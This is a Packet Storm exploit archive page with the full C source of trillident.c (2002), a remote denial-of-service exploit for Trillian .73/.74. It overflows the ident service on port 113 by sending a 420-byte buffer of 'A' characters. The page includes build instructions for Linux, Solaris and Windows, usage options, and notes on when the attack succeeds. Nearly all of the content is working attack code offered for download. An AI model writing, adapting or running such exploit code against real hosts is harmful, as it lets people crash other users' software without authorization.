what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

trillident.c

trillident.c
Posted Sep 21, 2002
Authored by Netmask

Exploit for the PRIVMESG remote denial of service vulnerability that exists in Trillian v.73 and .74 which sends an overflow in the ident connection. Compiles on Unix based OS's.

tags | exploit, remote, denial of service, overflow
systems | unix
SHA-256 | 94990303975887d9eb08dd573d347b40982b8656ef24da60ab7988959f5e4e9b

trillident.c

Change Mirror Download

/* Trillian .74, .73 remote DoS.. Trillian Pro 1.0
* Exploits buffer overflow in ident when sending over
* 418 bytes.
*
* Really only works if people are on IRC (otherwise, the ident
* daemon shuts down.. And you've got to know they are running
* Trillian, obviously.
*
* bug discovered by Lance Fitz-Herbert (aka phrizer) on 03 September 2002
*
*
* Compile With:
* Linux: gcc -o trillident trillident.c
* Solaris: gcc -o trillident trillident.c -lsocket -lnsl
* Windows: Windows: file -> open ->path_to_trilliandos.c , project->build executable
* NOT tested on windows.

ZZZZZZZZZZZZZZZZZZZ
Z:::::::::::::::::Z
nnnn nnnnnnnn Z:::::::::::::::::Z ooooooooooo
n:::nn::::::::nn Z:::ZZZZZZZ::::::Z oo:::::::::::oo
eeeeeeeeeee n::::::::::::::nn ZZZZZ * Z::::::Z o:::::::::::::::o
ee:::::::::::eenn:::::::::::::::n 2 Z:::::Z o:::::oooo::::::o
e:::::::::::::::een:::::nnnn:::::n 0 Z:::::Z o::::o o::o::::o
e::::::eeeee::::::en::::n n::::n 0 Z:::::Z o::::o o::oo::::o
e:::::e e:::::en::::n n::::n 2 Z:::::Z o::::oo::o o::::o
e::::::eeeee::::::en::::n n::::n * Z:::::Z o::::o::o o::::o
e::::::::::::::::e n::::n n::::n Z:::::Z o::::::oooo:::::o
e:::::eeeeeeeeeee n::::n n::::nZZZ:::::Z ZZZZZo:::::::::::::::o
e::::::e n::::n n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo
e:::::::e nnnnnn nnnnnnZ:::::::::::::::::Z ooooooooooo
e:::::::eeeeeeeeee Z:::::::::::::::::Z
ee::::::::::::::e ZZZZZZZZZZZZZZZZZZZ
ee:::::::::::::e \... www.enz-o.org .../
eeeeeeeeeeeeee

(The above is radical ascii art.. Respect it. The below is a lame DoS. )

win32 stuff by xbud
*/

#ifdef _WIN32
#include <winsock2.h>
#include <windows.h> /* remove on win2k */
#include <stdio.h>
#include <stdlib.h>
#else
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#endif
#define ERR -1



void usage(char* argv0);
int dostrill(char *ip, int port);

int main(int argc, char *argv[])
{

extern int optopt;
extern char *optarg;
int errorflag = 0; /* did someone screw up? */
int port = 113; /* default port to use unless -p */
int c;
#ifdef _WIN32
WORD werd;
WSADATA wd;
werd=MAKEWORD(2,0);
WSAStartup(werd,&wd);
#endif

if ((argc < 2) || (argc > 6))
usage(argv[0]);

while ((c=getopt(argc, argv, "vp:")) != EOF) {
switch(c) {
case 'p':
fprintf(stderr, "Using port %s\n", optarg);
port = strtol(optarg, NULL, 10);
break;
case 'v':
fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
fprintf(stderr, "written by: netmask@enZo\n\n");
exit(0);
case ':':
fprintf(stderr, "Option -%c requires an operand\n", optopt);
errorflag++;
break;
case '?':
fprintf(stderr, "Unrecognized option: -%c\n", optopt);
errorflag++;

}
}

if (errorflag) {
usage(argv[0]);
}

/* kill them */

dostrill(argv[argc-1], port);
fprintf(stderr, "Finished!\n");
return 0;
} /* end main */

void usage(char* argv0)
{
fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
fprintf(stderr, "Written by: netmask@enZo\n\n");
fprintf(stderr, "Usage: %s [options] IP\n\n", argv0);
fprintf(stderr,
"-p \tPort to use\n"
"-v \tPrint the program info\n");
exit(1);
}

int dostrill(char *ip, int port)
{
int s, r;
char buf[420]; /* buffer to send */

struct sockaddr_in addr;
struct hostent *hp;
memset((char *) &addr, '\0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port = htons(port);
memset(buf, 'A', 420);


if ((hp = gethostbyname(ip)) != NULL) {
if (hp->h_length > sizeof(addr.sin_addr)) {
hp->h_length = sizeof(addr.sin_addr); }
memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length);
}
else {
if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {
return(0);
}
}



s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (s == ERR) {
fprintf(stderr, "Couldn't Create Socket\n");
return 1;
}


r = connect(s, (struct sockaddr *) &addr, sizeof(addr));

if (r == ERR) {
fprintf(stderr, "Couldn't Establish Connection\n");
return 1;
}

fprintf(stderr, "Connected to %s and sending buffer\n\n", ip);
write(s, buf, strlen(buf)); /* send buffer */
#ifdef _WIN32
closesocet(s);
#else
close(s);
#endif
return 0;


}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close